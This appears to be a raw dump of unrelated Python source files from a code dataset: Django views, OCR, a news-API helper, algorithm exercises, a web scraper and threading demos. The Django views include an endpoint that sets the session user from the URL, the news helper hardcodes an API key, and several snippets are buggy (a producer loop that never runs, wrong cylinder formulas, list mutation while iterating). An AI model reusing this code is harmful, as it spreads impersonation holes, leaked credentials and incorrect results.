unittest.main()","sub_path":"unittest_&_factorymode/factory_mode/testcase_animal_factory.py","file_name":"testcase_animal_factory.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"348670893","text":"def isPerfect(num):\n acum = 0 # Zerando o acumulador\n for i in range(1, num): # Laço de repetição que vai de 1 até num\n if(num % i == 0): # Verificando se num é divisível por i\n acum = acum + i # Se for divisível, somamos no acumulador\n \n if(acum == num): # Verificando se a soma é igual ao próprio número\n return True # Se for perfeito, retornar verdadeiro\n else:\n return False # Se não for perfeito, retornar falso\n\nprint(isPerfect(28))\nprint(isPerfect(6))\nprint(isPerfect(496))\nprint(isPerfect(5))\nprint(isPerfect(10))\n","sub_path":"Algoritmos Na Prática/Exemplos e Desafios/isPerfect.py","file_name":"isPerfect.py","file_ext":"py","file_size_in_byte":580,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"518680812","text":"from django.shortcuts import render\n\n# Create your views here.\nfrom django.http import HttpResponse\nfrom django.http import HttpRequest\nfrom .models import DirPersonnel\nfrom . import connector\nimport json\nfrom . import wechatuser\n\ndef index(request):\n\t# context = {\n\t# \t'teams_list': Teams.objects.all(), \n\t# \t'tasks_list': Tasks.objects.all()\n\t# }\n\tcontext = {\n\t\t'teams_list': [connector.getHotGroups(4)],\n\t\t'tasks_list': [connector.getRecentTasks(5)],\n\t}\n\n\treturn render(request, 'appuser/index.html', context)\n\ndef wechat(request):\n \"\"\"Renders the wechat page.\"\"\"\n assert isinstance(request, HttpRequest)\n nsukey = request.GET.get('nsukey', 'none')\n if ( nsukey == 'none'):\n datadict = wechatuser.getUser(request)\n urlopenid = datadict['openid']\n try:\n person = DirPersonnel.objects.get(openID=urlopenid)\n person_id = person.person_id\n request.session['person_id'] = person_id\n request.session.set_expiry(0)\n request.session.save()\n except DirPersonnel.DoesNotExist:\n pass\n return index(request)\n\ndef allteams(request):\n\tcontext = { 'teamsjson':[connector.getAllTeams()] }\n\treturn render(request, 'appuser/allteams.html',context)\n \ndef alltasks(request):\n\tcontext = { 'tasksjson':[connector.getAllTasks()] }\n\treturn render(request, 'appuser/task-list.html',context)\n\ndef teams(request,teamid):\n\tcontext = {'teamjson':[connector.getTeambyID(teamid)]}\n\treturn render(request, 'appuser/team.html',context)\n\ndef taskdetail(request, taskid):\n context = {'taskdetail':connector.getTaskbyID(taskid)}\n return render(request, 'appuser/task-detail.html',context)\n\n \ndef setpersonid(request, personid):\n request.session['person_id'] = personid\n request.session.set_expiry(0)\n request.session.save()\n context = { 'personid':request.session['person_id'] }\n return render(request, 'appuser/setpersonid.html',context)\n\ndef getpersonid(request):\n if 'person_id' in request.session:\n context = { 'personid':request.session['person_id'] }\n else:\n context = { 'personid':'No user set' }\n return render(request, 'appuser/getpersonid.html',context)\n ","sub_path":"sitedir/appuser/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"74013222","text":"import sys\r\n\r\nfrom PIL import Image\r\nimport pytesseract\r\nimport numpy as np\r\nfrom cv2 import GaussianBlur, normalize, NORM_MINMAX, threshold, THRESH_BINARY\r\nfrom spellchecker import SpellChecker\r\nfrom autocorrect import Speller\r\n\r\npytesseract.pytesseract.tesseract_cmd = r\"C:\\Program Files\\Tesseract-OCR\\tesseract.exe\"\r\n\r\ndef readerMain(filename):\r\n\r\n spell = SpellChecker()\r\n spell2 = Speller(lang = \"en\")\r\n\r\n img = np.array(Image.open(filename))\r\n norm_img = np.zeros((img.shape[0], img.shape[1]))\r\n\r\n img = normalize(img, norm_img, 0, 255, NORM_MINMAX)\r\n img = threshold(img, 100, 255, THRESH_BINARY)[1]\r\n img = GaussianBlur(img, (1, 1), 0)\r\n\r\n def convert(lst):\r\n return ([i for item in lst for i in item.split()])\r\n\r\n text = [str(pytesseract.image_to_string(img))]\r\n ctext = convert(text)\r\n scheckedtext = []\r\n\r\n with open(\"Words.txt\", \"w+\") as file:\r\n for i in ctext:\r\n i = spell2(spell.correction(i))\r\n scheckedtext.append(i)\r\n file.write(i + \"\\n\")\r\n\r\n for i in range(7):\r\n scheckedtext.insert(0, \" \")\r\n\r\n return scheckedtext\r\n\r\n\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"191493208","text":"import ael\ntry:\n infile = open('C:\\\\Documents and Settings\\\\abhj106\\\\My Documents\\\\EersteFloerwerk\\\\changedeals.csv')\nexcept:\n print('Error opening file')\nnewCp = ael.Party['DMX INTERNAL FX']\nprint('New: ', newCp.ptyid)\nline = infile.readline()\nwhile line:\n trdn = line.rstrip()\n trd = ael.Trade[(int)(trdn)]\n #print trd.counterparty_ptynbr.ptyid\n trdclone = trd.clone()\n trdclone.counterparty_ptynbr = newCp\n print('old: ', trd.counterparty_ptynbr.ptyid)\n print('New: ', trdclone.counterparty_ptynbr.ptyid)\n trdclone.commit()\n line = infile.readline()\ninfile.close()\n","sub_path":"Python modules/SAIRD_MoveCP_From_File.py","file_name":"SAIRD_MoveCP_From_File.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"341264932","text":"def dbl_linear(n):\n set_ = list()\n x = 1\n index = 0\n set_.append(x)\n while len(set_) <= n:\n tmp_set_ = set_\n for x in set_:\n tmp_set_.append(2*x+1)\n tmp_set_.append(3*x+1)\n set_ = tmp_set_\n set_.sort()\n return set_\n\n\ndef dbl_linear(n):\n arr = [1]\n y_incr, z_incr = 0, 0\n for i in range(n):\n y = arr[y_incr]*2+1\n z = arr[z_incr]*3+1\n if y <= z:\n arr.append(y)\n y_incr += 1\n if y == z:\n z_incr += 1\n else:\n arr.append(z)\n z_incr += 1\n return arr[n]\n\n'''\n\nin cpp\n\n#include \n#include \n#include \n\nstatic int dblLinear(int n){\n std::vector arr = {n};\n int y_incr = 0;\n int z_incr = 0;\n for (int i = 0; i < n; i++){\n int y = arr[y_incr]*2+1;\n int z = arr[z_incr]*3+1;\n if (y <= z){\n arr.push_back(y);\n y_incr += 1;\n if (y == z){\n z_incr += 1;\n }\n } else {\n arr.push_back(z);\n z_incr += 1;\n }\n }\n return arr[n];\n}\n\nint main(){\n std::cout << dblLinear(10);\n return 0;\n}\n\n'''","sub_path":"Algorithms/Double Linear 2 solns.py","file_name":"Double Linear 2 solns.py","file_ext":"py","file_size_in_byte":1210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"384348540","text":"from connection import algo_client\r\nimport logging\r\n\r\n\r\n# Get account information of an address\r\ndef enquireAddress(accountAddress):\r\n try:\r\n assert(len(accountAddress) == 58)\r\n account_info = algo_client.account_info(accountAddress)\r\n print(account_info)\r\n logging.info(\"..@dev Enquire account.. \\nAccount information: {}\\n\".format(account_info))\r\n except Exception as err:\r\n msg = \"Address is invalid. \\n Length must be 58\\n\"\r\n logging.info(\"..@dev Enquire account Error.. \\nError getting account information: {}Message: {}\\n\".format(msg, err))\r\n","sub_path":"accountInquiry.py","file_name":"accountInquiry.py","file_ext":"py","file_size_in_byte":596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"104062273","text":"import requests\r\nimport json\r\n\r\nAPI_KEY = \"27bd1bb9af0b4379852de8226697827d\"\r\n\r\n\r\ndef return_list(url):\r\n data = requests.get(url)\r\n diction_load = json.loads(data.content)\r\n\r\n List = []\r\n if diction_load['status'] == \"error\":\r\n print(\"error\")\r\n articles = diction_load['articles']\r\n for item in articles:\r\n dictionary = {}\r\n dictionary['author'] = item['author']\r\n dictionary['title'] = item['title']\r\n dictionary['url'] = item['url']\r\n dictionary['imageSrc'] = item['urlToImage']\r\n dictionary['time'] = item['publishedAt']\r\n List.append(dictionary)\r\n return List\r\n\r\n\r\ndef top_headlines_search(search):\r\n search_top_headlines = \"https://newsapi.org/v2/top-headlines?q=\" + search + \"&apiKey=\" + API_KEY\r\n List = return_list(search_top_headlines)\r\n print(List)\r\n return List\r\n\r\n\r\ndef get_top_headlines_category(category):\r\n country = \"in\"\r\n top_headlines_category = \"https://newsapi.org/v2/top-headlines?country=\" + country + \"&category=\" + category + \"&apiKey=\" + API_KEY\r\n List = return_list(top_headlines_category)\r\n print(List)\r\n\r\n\r\ndef get_news_from_source(source):\r\n top_headlines_src = \"https://newsapi.org/v2/top-headlines?sources=\" + source + \"&apiKey=\" + API_KEY\r\n List = return_list(top_headlines_src)\r\n print(List)\r\n\r\n\r\ndef get_top_headlines_country(country):\r\n country = country\r\n top_headlines_country = \"https://newsapi.org/v2/top-headlines?country=\" + country + \"&apiKey=\" + API_KEY\r\n List = return_list(top_headlines_country)\r\n print(List)\r\n","sub_path":"scl-mini-sankalp/flaskProject/helper.py","file_name":"helper.py","file_ext":"py","file_size_in_byte":1579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"383348792","text":"#\n# @lc app=leetcode.cn id=416 lang=python3\n#\n# [416] 分割等和子集\n#\n\n\n# @lc code=start\nclass Solution:\n def canPartition(self, nums: List[int]) -> bool:\n total = sum(nums)\n if total % 2 != 0:\n return False\n\n sz = len(nums)\n wt = total // 2 + 1\n dp = [False for _ in range(wt)]\n dp[0] = True\n for i in range(sz):\n for j in range(wt - 1, -1, -1):\n if (j - nums[i] >= 0):\n dp[j] = dp[j] | dp[j - nums[i]]\n\n return dp[wt - 1]\n\n\n# @lc code=end\n","sub_path":"records/416.分割等和子集.py","file_name":"416.分割等和子集.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"198363680","text":"from typing import Iterable, Set, List, Dict\n\nfrom exporter.graph.entity.input import Input\nfrom exporter.graph.entity.output import Output\nfrom .protocol import ProtocolLink\n\n\nclass ProcessLink:\n def __init__(self, process_uuid: str, process_type: str,\n inputs: Iterable[Input], outputs: Iterable[Output], protocols: Iterable[\n ProtocolLink]):\n self._input_uuids: Set[str] = set()\n self._outputs_uuids: Set[str] = set()\n self._protocol_uuids: Set[str] = set()\n\n self.process_uuid = process_uuid\n self.process_type = process_type\n self.inputs: List[Input] = list()\n self.outputs: List[Output] = list()\n self.protocols: List[ProtocolLink] = list()\n\n for i in inputs:\n self.add_input(i)\n\n for o in outputs:\n self.add_output(o)\n\n for p in protocols:\n self.add_protocol(p)\n\n def add_input(self, i: Input):\n if i.input_uuid not in self._input_uuids:\n self._input_uuids.add(i.input_uuid)\n self.inputs.append(i)\n\n def add_output(self, o: Output):\n if o.output_uuid not in self._outputs_uuids:\n self._outputs_uuids.add(o.output_uuid)\n self.outputs.append(o)\n\n def add_protocol(self, p: ProtocolLink):\n if p.protocol_uuid not in self._protocol_uuids:\n self._protocol_uuids.add(p.protocol_uuid)\n self.protocols.append(p)\n\n def to_dict(self) -> Dict:\n return dict(\n link_type=\"process_link\",\n process_id=self.process_uuid,\n process_type=self.process_type,\n inputs=[i.to_dict() for i in self.inputs],\n outputs=[o.to_dict() for o in self.outputs],\n protocols=[p.to_dict() for p in self.protocols]\n )\n","sub_path":"exporter/graph/link/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":1810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"479004977","text":"\"\"\"\nModule:\nload training data and split into training, validating and testing\ninclude: hurricane, atmospheric river and fronts\n\"\"\"\n\nimport os\nimport numpy\nimport h5py\nimport logging\nimport sklearn\nfrom sklearn import preprocessing\nimport ipdb\n\nlogger=logging.getLogger(\"data_loader\")\nlogger.setLevel(\"INFO\")\n\n#define function to load the data \n\ndef happy_loader(rng_seed,path,fname,groups,train_num_p,valid_num_p,test_num_p,train_num_n,valid_num_n,test_num_n,n_type,normalize):\n \"\"\"\n load hurricane, atmospheric river, fronts data and split into train, valid and test set\n \"\"\"\n numpy.random.seed(rng_seed)\n #NOTE, NEON seems has problmes of the RNG_SEED in the backend, I am explicitly specify the seeds here\n\n ff=os.path.join(path,fname)\n\n logger.info(\"training data...%s\" %ff)\n data=h5py.File(ff,\"r\")\n hurricane_positive=data[groups[0]]\n hurricane_negative=data[groups[1]]\n\n #generally follow the 80%-20% rule, X is data, Y is label\n X_train=numpy.vstack((hurricane_positive[:train_num_p],hurricane_negative[:train_num_n]))\n Y_train=numpy.hstack((numpy.ones(train_num_p),numpy.zeros(train_num_n)))\n \n X_valid=numpy.vstack((hurricane_positive[train_num_p:train_num_p+valid_num_p],\n hurricane_negative[train_num_n:train_num_n+valid_num_n]))\n Y_valid=numpy.hstack((numpy.ones(valid_num_p),numpy.zeros(valid_num_n)))\n\n X_test=numpy.vstack((hurricane_positive[train_num_p+valid_num_p:train_num_p+valid_num_p+test_num_p],\n hurricane_negative[train_num_n+valid_num_n:train_num_n+valid_num_n+test_num_n]))\n Y_test=numpy.hstack((numpy.ones(test_num_p),numpy.zeros(test_num_n)))\n \n #normalize data if normalize is needed\n if normalize:\n if abs(n_type -1)==0: #global contrast\n X_train=global_contrast_norm(X_train)\n X_valid=global_contrast_norm(X_valid)\n X_test=global_contrast_norm(X_test)\n elif abs(n_type -2)==0: #standard norm \n X_train=stand_norm(X_train)\n X_valid=stand_norm(X_valid)\n X_test=stand_norm(X_test)\n elif abs(n_type -3)==0: #sklearn style l1/l2 norm\n X_train=norm_norm(X_train)\n X_valid=norm_norm(X_valid)\n X_test=norm_norm(X_test)\n \n # randomly shuffle data, mixing positive and negative example\n X_train,Y_train=rand_data(X_train,Y_train)\n X_valid,Y_valid=rand_data(X_valid,Y_valid)\n X_test,Y_test=rand_data(X_test,Y_test)\n\n #flat all input images into feature vector (The ner version of NEON requires data be presented this way)\n X_train=fllat(X_train)\n X_valid=fllat(X_valid)\n X_test=fllat(X_test)\n\n return (X_train, Y_train), (X_valid, Y_valid), (X_test, Y_test)\n\ndef fllat(A):\n \"\"\"\n flat input images into a one dimensional feature vector\n pay attention to the nD array structure\n A: image data\n \"\"\"\n shp=A.shape\n B=A.reshape(shp[0],-1) #flat all except the first dimension\n return B\n\ndef rand_data(A,B):\n \"\"\"\n randomly mixing/shuffing the positive and negative example\n A: image data\n B: corresponding label\n \"\"\"\n logger.info(\"randomly shuffle data...\")\n ss=range(len(A))\n numpy.random.shuffle(ss)\n A=A[ss]\n B=B[ss] \n\n return A, B\n\n\n\"\"\"\nI previously found that classification model performance and modle overfitting \nis sensitive to the data normalizaion. Here try several normalization technique\n1) simple feature scaling (scale to [0,1] or [-1,1])\n2) gobal contrast normalization\n3) l1 or l2 norm normalization\n\"\"\"\n\ndef global_contrast_norm(A, scale=1.0,min_divisor=1e-8):\n \"\"\"\n ###this function is the same as in NEON source code\n Subtract mean and normalize by vector norm [normalize accross channel]\n A: image data\n \"\"\"\n \n logger.info(\"do global contrast normalization...\")\n A = A - A.mean(axis=1)[:, numpy.newaxis]\n\n normalizers = numpy.sqrt((A ** 2).sum(axis=1)) / scale\n normalizers[normalizers < min_divisor] = 1.\n\n A /= normalizers[:, numpy.newaxis]\n\n return A\n\ndef stand_norm(A):\n \"\"\"\n subtract mean and divide by standard deviation of each channel\n A: image data\n \"\"\"\n logger.info(\"do standard normalization...\")\n\n sh=A.shape\n A =A.reshape(sh[0],sh[1],-1) #flat feature of each channel\n A =A -A.mean(axis=2)[:,:,numpy.newaxis] #numpy.newaxis makes a new matrix dimension\n stdd=A.std(axis=2)[:,:,numpy.newaxis]\n stdd[stdd<1e-8]=1.\n A /=stdd\n #A /= A.std(axis=2)[:,:,numpy.newaxis]\n\n A=A.reshape(sh)\n \n return A\n\ndef norm_norm(A):\n \"\"\"\n l1 norm of input data (scikit learn)\n A: image data\n \"\"\"\n logger.info(\"do l1/l2 norm normalization...\")\n sh=A.shape\n A=A.reshape(sh[0],sh[1],-1)\n for i in range(sh[0]):\n A[i]=preprocessing.normalize(A[i], axis=1,norm=\"l2\")\n \n A=A.reshape(sh)\n return A\n \n","sub_path":"elephant/data_load.py","file_name":"data_load.py","file_ext":"py","file_size_in_byte":4853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"422938337","text":"def count_words(input_str):\n ''' Returns a dictionary with counts of each word in a string '''\n words = input_str.split(' ')\n slimwords = []\n worddict = {}\n for word in words:\n if word not in slimwords:\n slimwords.append(word)\n for word in slimwords:\n worddict[word] = words.count(word)\n return worddict\n","sub_path":"count_words/count.py","file_name":"count.py","file_ext":"py","file_size_in_byte":350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"583662383","text":"# Copyright (c) 2020-2023 Antmicro \n#\n# SPDX-License-Identifier: Apache-2.0\n\nimport pytest\nfrom typing import Type, Tuple\nfrom pathlib import Path\n\nfrom kenning.core.runtime import Runtime\nfrom kenning.core.dataset import Dataset\nfrom kenning.core.model import ModelWrapper\nfrom kenning.runtimes.renode import RenodeRuntime\nfrom kenning.runtimeprotocols.uart import UARTProtocol\nfrom kenning.utils.class_loader import get_all_subclasses\nfrom kenning.tests.core.conftest import get_default_dataset_model\nfrom kenning.tests.core.conftest import UnknownFramework\n\n\nRUNTIME_SUBCLASSES = get_all_subclasses(\n 'kenning.runtimes',\n Runtime,\n raise_exception=True\n)\n\nRUNTIME_INPUTTYPES = [\n (run, inp) for run in RUNTIME_SUBCLASSES for inp in run.inputtypes\n]\n\n\ndef prepare_objects(\n runtime_cls: Type[Runtime],\n inputtype: str) -> Tuple[Runtime, Dataset, ModelWrapper]:\n try:\n dataset, model = get_default_dataset_model(inputtype)\n except UnknownFramework:\n pytest.xfail(f'Unknown framework: {inputtype}')\n\n if runtime_cls is RenodeRuntime:\n resources_path = Path('build/renode-resources/springbok')\n runtime = runtime_cls(\n protocol=UARTProtocol('/tmp/uart', 115200),\n runtime_binary_path=resources_path / 'iree_runtime',\n platform_resc_path=resources_path / 'springbok.resc',\n disable_profiler=True\n )\n else:\n runtime = runtime_cls(protocol=None, model_path=model.model_path)\n\n return runtime, dataset, model\n\n\nclass TestRuntime:\n\n @pytest.mark.parametrize('runtime_cls,inputtype', [\n pytest.param(runtime_cls, inputtype, marks=[\n pytest.mark.dependency(\n name=f'test_initializer[{runtime_cls.__name__}]'\n ),\n pytest.mark.xdist_group(name=f'TestRuntime_{runtime_cls.__name__}')\n ])\n for runtime_cls, inputtype in RUNTIME_INPUTTYPES\n ])\n def test_initializer(self, runtime_cls: Type[Runtime], inputtype: str):\n \"\"\"\n Tests runtime initialization.\n \"\"\"\n _ = prepare_objects(runtime_cls, inputtype)\n\n @pytest.mark.parametrize('runtime_cls,inputtype', [\n pytest.param(runtime_cls, inputtype, marks=[\n pytest.mark.dependency(\n name=f'test_prepare_local[{runtime_cls.__name__}]',\n depends=[f'test_initializer[{runtime_cls.__name__}]']\n ),\n pytest.mark.xdist_group(name=f'TestRuntime_{runtime_cls.__name__}')\n ])\n for runtime_cls, inputtype in RUNTIME_INPUTTYPES\n ])\n def test_prepare_local(self, runtime_cls: Type[Runtime], inputtype: str):\n \"\"\"\n Tests the `preprocess_input` method.\n \"\"\"\n runtime, _, _ = prepare_objects(runtime_cls, inputtype)\n\n try:\n assert runtime.prepare_local()\n except NotImplementedError:\n pytest.xfail(f'{runtime_cls.__name__} does not support local run')\n\n @pytest.mark.parametrize('runtime_cls,inputtype', [\n pytest.param(runtime_cls, inputtype, marks=[\n pytest.mark.dependency(\n depends=[f'test_prepare_local[{runtime_cls.__name__}]']\n ),\n pytest.mark.xdist_group(name=f'TestRuntime_{runtime_cls.__name__}')\n ])\n for runtime_cls, inputtype in RUNTIME_INPUTTYPES\n ])\n def test_inference(self, runtime_cls: Type[Runtime], inputtype: str):\n \"\"\"\n Tests the `run_locally` method.\n \"\"\"\n runtime, dataset, model = prepare_objects(runtime_cls, inputtype)\n\n runtime.run_locally(dataset, model, str(model.model_path))\n","sub_path":"kenning/tests/core/test_runtime.py","file_name":"test_runtime.py","file_ext":"py","file_size_in_byte":3646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"48619722","text":"# -*- coding: utf-8 -*-\ndef convert_number(s):\n\ttry:\n\t\treturn int(s)\n\texcept ValueError:\n\t\treturn None\n\ndef scan(sentence):\n\tdirections = \"north, south, east, west, down, up, left, right, back\".split(', ')\n\tverbs = \"go, stop, kill, eat\".split(\", \")\n\tstops = \"the, in, of, from, at, it\".split(\", \")\n\tnouns = \"door, bear, princess, cabinet\".split(\", \")\n\twords = sentence.split(' ')\n\tresults = []\n\tfor word in words:\n\t\tif word in directions:\n\t\t\tresults.append(('direction', word))\n\t\telif word in verbs:\n\t\t\tresults.append(('verb', word))\n\t\telif word in stops:\n\t\t\tresults.append(('stop', word))\n\t\telif word in nouns:\n\t\t\tresults.append(('noun', word))\n\t\telif None != convert_number(word):\n\t\t\tresults.append(('number', int(word)))\n\t\telse:\n\t\t\tresults.append(('error', word))\n\treturn results","sub_path":"learn python the hard way/ex48/ex48/lexicon.py","file_name":"lexicon.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"406366305","text":"# -*- coding: utf-8 -*-\nimport datetime\nimport urlparse\n\nimport dateutil.parser\nimport scrapy\nfrom scrapy.linkextractors import LinkExtractor\nfrom scrapy.spiders import CrawlSpider, Rule\n\nfrom corpus_builder.items import TextEntry\n\n\nclass JanakanthaSpider(CrawlSpider):\n name = \"janakantha\"\n allowed_domains = [\"dailyjanakantha.com\"]\n\n rules = (\n Rule(\n LinkExtractor(\n # https://www.dailyjanakantha.com/details/article/194671/%E0%A6%AA%E0%A6%A5%E0%A7%87-%E0%A6%AA%E0%A6%A5%E0%A7%87-%E0%A6%9A%E0%A6%BE%E0%A6%81%E0%A6%A6%E0%A6%BE%E0%A6%AC%E0%A6%BE%E0%A6%9C%E0%A6%BF\n allow=('/details/article/\\d+/[^\\/]+$'),\n restrict_xpaths=('//div[@class=\"content\"]')\n ),\n callback='parse_news'),\n )\n\n def __init__(self, start_date=None, end_date=None, category=None, *a, **kw):\n self.start_date = dateutil.parser.parse(start_date)\n\n if end_date:\n self.end_date = dateutil.parser.parse(end_date)\n else:\n self.end_date = self.start_date\n\n self.category = category or None\n\n super(JanakanthaSpider, self).__init__(*a, **kw)\n\n def start_requests(self):\n yield scrapy.Request('https://www.dailyjanakantha.com/',\n callback=self.start_categorized_requests)\n\n def start_categorized_requests(self, response):\n menu_links = [urlparse.urlparse(x.strip()).path.split('/')[-1] \\\n for x in response.css('nav.menu a::attr(\"href\")').extract()]\n categories = [x for x in menu_links if (not x == \"\" and not x == \"#\")]\n\n if self.category is not None:\n if self.category in categories:\n categories = [self.category]\n else:\n raise ValueError('invalid category slug. available slugs: %s' % \", \".join(categories))\n\n date_processing = self.start_date\n while date_processing <= self.end_date:\n for category in categories:\n # https://www.dailyjanakantha.com/frontpage/date/2016-06-01\n url = 'https://www.dailyjanakantha.com/{0}/date/{1}'.format(\n category,\n date_processing.strftime('%Y-%m-%d')\n )\n yield self.make_requests_from_url(url)\n date_processing += datetime.timedelta(days=1)\n\n def parse_news(self, response):\n item = TextEntry()\n item['body'] = \"\".join(part for part in response.css('p.artDetails *::text').extract())\n return item\n","sub_path":"corpus_builder/spiders/janakantha.py","file_name":"janakantha.py","file_ext":"py","file_size_in_byte":2548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"220839620","text":"# Copyright 2013 OpenStack Foundation\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport os\n\nfrom oslo_config import cfg\nimport oslo_i18n\nfrom oslo_log import log\n\nfrom keystone.common import profiler\n\n\n# NOTE(dstanek): i18n.enable_lazy() must be called before\n# keystone.i18n._() is called to ensure it has the desired lazy lookup\n# behavior. This includes cases, like keystone.exceptions, where\n# keystone.i18n._() is called at import time.\noslo_i18n.enable_lazy()\n\n\nfrom keystone.common import config\nfrom keystone.server import common\nfrom keystone.version import service as keystone_service\n\n\nCONF = cfg.CONF\n\n\ndef initialize_application(name,\n post_log_configured_function=lambda: None,\n config_files=None):\n if not config_files:\n config_files = None\n\n common.configure(config_files=config_files)\n\n # Log the options used when starting if we're in debug mode...\n if CONF.debug:\n CONF.log_opt_values(log.getLogger(CONF.prog), log.DEBUG)\n\n post_log_configured_function()\n\n def loadapp():\n return keystone_service.loadapp(\n 'config:%s' % config.find_paste_config(), name)\n\n _unused, application = common.setup_backends(\n startup_application_fn=loadapp)\n\n # setup OSprofiler notifier and enable the profiling if that is configured\n # in Keystone configuration file.\n profiler.setup(name)\n\n return application\n\n\ndef _get_config_files(env=None):\n if env is None:\n env = os.environ\n\n dirname = env.get('OS_KEYSTONE_CONFIG_DIR', '').strip()\n\n files = [s.strip() for s in\n env.get('OS_KEYSTONE_CONFIG_FILES', '').split(';') if s.strip()]\n\n if dirname:\n if not files:\n files = ['keystone.conf']\n files = [os.path.join(dirname, fname) for fname in files]\n\n return files\n\n\ndef initialize_admin_application():\n return initialize_application(name='admin',\n config_files=_get_config_files())\n\n\ndef initialize_public_application():\n return initialize_application(name='main',\n config_files=_get_config_files())\n","sub_path":"keystone/keystone/server/wsgi.py","file_name":"wsgi.py","file_ext":"py","file_size_in_byte":2687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"635862780","text":"'''\nWrite the necessary code calculate the volume and surface area\nof a cylinder with a radius of 3.14 and a height of 5. Print out the result.\n\n\n'''\n\nimport cmath\n\nvolume = 3.14 ** 2 * cmath.pi\nsurface = 3.14 * 2 * cmath.pi + 5 * 3.14\n\nprint(volume)\nprint(surface)","sub_path":"labs/02_basic_datatypes/02_01_cylinder.py","file_name":"02_01_cylinder.py","file_ext":"py","file_size_in_byte":265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"4640453","text":"from regex_handler import RegexHandlerFromFile, RegexHandlerFromInput\nimport argparse\nfrom sys import stdin\n\nglobal path\nglobal regex\nglobal input_t\n\n\ndef startup_handler():\n global path\n global regex\n global input_t\n\n parser = argparse.ArgumentParser(description='Grep like program to search files or text for keywords using regexes')\n exclusive = parser.add_mutually_exclusive_group()\n exclusive.add_argument('-p', '--path', help='Path to file to be searched.')\n exclusive.add_argument('-i', '--input', help='Choose to enter input manually instead of a file', action='store_true')\n parser.add_argument('-r', '--regex', help='Define the regular expression.')\n args = parser.parse_args()\n\n regex = args.regex\n path = args.path\n input_t = args.input\n\n\ndef main():\n startup_handler()\n\n if not input_t:\n handler = RegexHandlerFromFile(path, regex)\n handler.print_finds()\n else:\n text = ''\n for line in stdin:\n text += line\n handler = RegexHandlerFromInput(text, regex)\n handler.print_finds()\n\nif __name__ == '__main__':\n main()\n","sub_path":"Interpreted/Python/Priv/idea_bag/regex_query_tool/greppy.py","file_name":"greppy.py","file_ext":"py","file_size_in_byte":1126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"200984661","text":"# Our program has mant threads, we want to implement comunication between these threads.\n\n# Using queue module Queue. Firstly, we create a Queue instance, which will be shared by all the threads. Then threads can use put() and get() to add or remove elements.\n\nfrom queue import Queue\nfrom threading import Thread\nimport time\n\n_sentinel = object()\n\n# A thread that produces data\ndef producer(out_q):\n\tn = 10\n\twhile n > 10:\n\t\t# Produce some data\n\t\tout_q.put(n)\n\t\ttime.sleep(2)\n\t\tn -= 1\n\n\t# Put the sential on the queue to indicate completion\n\tout_q.put(_sentinel)\n\n# A thread that consumes data\ndef consumer(in_q):\n\twhile True:\n\t\t# Get some data\n\t\tdata = in_q.get()\n\n\t\t# Check for termination\n\t\tif data is _sentinel:\n\t\t\tin_q.put(_sentinel)\n\t\t\tbreak\n\n\t\t# Process the data\n\t\tprint ('Got:', data)\n\tprint ('Consumer shutting down')\n\nif __name__ == '__main__':\n\tq = Queue()\n\tt1 = Thread(target=consumer, args=(q,))\n\tt2 = Thread(target=producer, args=(q,))\n\tt1.start()\n\tt2.start()\n\tt1.join()\n\tt2.join()\n","sub_path":"12_cocurrency/3_connections_between_threads/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"605746113","text":"from django.urls import path\nfrom palette.views import PaletteDetailView, PaletteFormView, PaletteDeleteView\n\napp_name = 'palette'\n\nurlpatterns = [\n path('', view=PaletteFormView.as_view(), name='new'),\n path('/', view=PaletteDetailView.as_view(), name='detail'),\n path('/delete/', view=PaletteDeleteView.as_view(), name='delete'),\n]","sub_path":"palette/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"149228916","text":"import os\nimport numpy as np\nimport math\nimport matplotlib.pyplot as plt\nfrom collections import defaultdict\nfrom scipy.misc import imread\nfrom skimage.feature import canny\nfrom 